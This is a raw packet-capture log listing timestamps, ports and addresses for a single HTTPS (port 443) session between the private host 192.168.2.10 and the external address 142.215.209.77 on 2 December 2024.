Dec 2, 2024 07:38:09.525389910 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.525418997 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.527915001 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.527923107 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.528014898 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.528028965 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.531158924 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.531193018 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.531265020 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.531265974 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.531275988 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.533960104 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.534037113 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.534044981 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.536547899 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.536850929 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.536860943 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.539339066 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.539432049 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.539444923 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.542642117 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.542706013 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.542715073 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.545254946 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.545331955 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.545341969 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.547949076 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.548067093 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.548079967 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.551282883 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.551353931 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.551362991 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.554327965 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.554414988 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.554425001 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.556912899 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.557003021 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.557015896 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.559901953 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.560029030 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.560039043 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.562444925 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.562510014 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.562520027 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.607026100 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.678399086 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.678410053 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.678608894 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.678630114 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.723596096 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.723640919 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.723789930 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.723809004 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.726047039 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.726054907 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.726087093 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.726134062 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.726149082 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.726161003 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.729554892 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.729562998 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.729635954 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.729650974 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.732875109 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.732884884 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.732979059 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.732992887 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.734872103 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.734879971 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.734970093 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.734983921 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.738230944 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.738264084 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.738315105 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.738327980 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.738337040 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.741178989 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.741259098 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.741269112 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.743649960 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.743758917 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.743772984 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.747106075 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.747191906 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.747209072 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.749564886 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.749656916 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.749670982 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.752567053 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.752635956 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.752645969 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.755283117 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.755367041 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.755377054 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.758671999 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.758744001 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.758754015 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.761321068 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.761384964 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.761395931 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.763767004 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.763824940 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.763837099 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.810055971 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.880155087 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.880167007 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.880287886 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.880306959 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.925188065 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.925198078 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.925342083 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.925359964 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.928132057 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.928138971 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.928160906 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.928195000 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.928208113 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.928224087 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.930761099 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.930768967 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.930838108 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.930850029 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.934268951 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.934276104 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.934333086 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.934344053 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.936783075 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.936793089 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.936846972 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.936858892 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.939340115 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.939368010 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.939395905 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.939407110 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.939420938 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.942006111 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.942064047 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.942075014 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.945570946 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.945636988 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.945648909 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.948255062 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.948317051 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.948326111 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.951282024 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.951334000 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.951344013 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.954328060 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.954387903 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.954396963 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.957123995 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.957196951 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.957206964 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.959809065 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.959868908 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.959880114 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.962343931 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.962404966 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.962416887 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.965825081 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:09.965908051 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:09.965918064 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.013281107 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.081172943 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.081186056 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.081255913 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.081271887 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.122551918 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.126815081 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.126822948 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.126847029 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.126895905 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.126924038 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.129257917 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.129266977 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.129337072 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.129354000 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.132690907 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.132699966 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.132766962 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.132790089 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.135600090 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.135632038 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.135672092 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.135684013 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.135703087 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.137969017 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.138071060 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.138081074 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.141405106 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.141472101 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.141483068 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.143964052 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.144032001 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.144042969 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.147286892 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.147378922 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.147388935 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.150048971 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.150106907 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.150115967 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.153135061 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.153237104 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.153248072 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.155658007 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.155754089 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.155764103 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.159142017 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.159208059 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.159218073 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.161722898 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.161792994 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.161802053 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.164340019 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.164447069 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.164460897 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.167299986 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.167402029 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.167412996 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.216371059 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.282705069 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.282716036 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.282860041 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.282879114 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.325705051 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.328293085 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.328305006 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.328340054 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.328375101 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.328430891 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.331257105 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.331264973 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.331336021 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.331350088 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.333616018 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.333623886 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.333678007 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.333690882 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.336986065 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.337014914 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.337042093 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.337052107 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.337080956 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.339673042 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.339731932 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.339745045 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.343010902 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.343070984 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.343081951 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.345614910 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.345676899 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.345686913 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.348419905 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.348476887 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.348486900 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.351686001 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.351742029 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.351752996 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.354291916 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.354351044 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.354362011 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.357302904 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.357362032 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.357371092 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.360085964 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.360142946 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.360152960 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.363532066 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.363620996 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.363636971 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.365988016 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.366049051 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.366063118 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.368793011 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.368850946 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.368864059 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.419440031 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.484102011 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.484112978 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.484184980 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.484203100 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.528816938 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.530042887 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.530051947 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.530078888 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.530129910 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.530181885 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.532413006 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.532423019 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.532485008 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.532500029 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.535825968 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.535835028 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.535895109 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.535907030 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.538436890 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.538444996 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.538506985 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.538517952 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.541924000 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.541960955 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.541992903 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.542002916 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.542016983 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.544464111 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.544531107 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.544542074 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.547147036 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.547408104 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.547416925 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.551352024 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.551419020 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.551429033 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.554943085 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.555012941 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.555022955 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.558429956 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.558491945 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.558501959 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.560300112 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.560374022 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.560381889 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.563055992 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.563122034 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.563131094 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.564785004 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.564850092 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.564857960 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.567507982 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.567584038 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.567594051 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.570875883 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.570955992 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.570966005 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.622567892 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.685404062 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.685415030 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.685477018 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.685492039 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.731230021 CET	443	49716	142.215.209.77	192.168.2.10
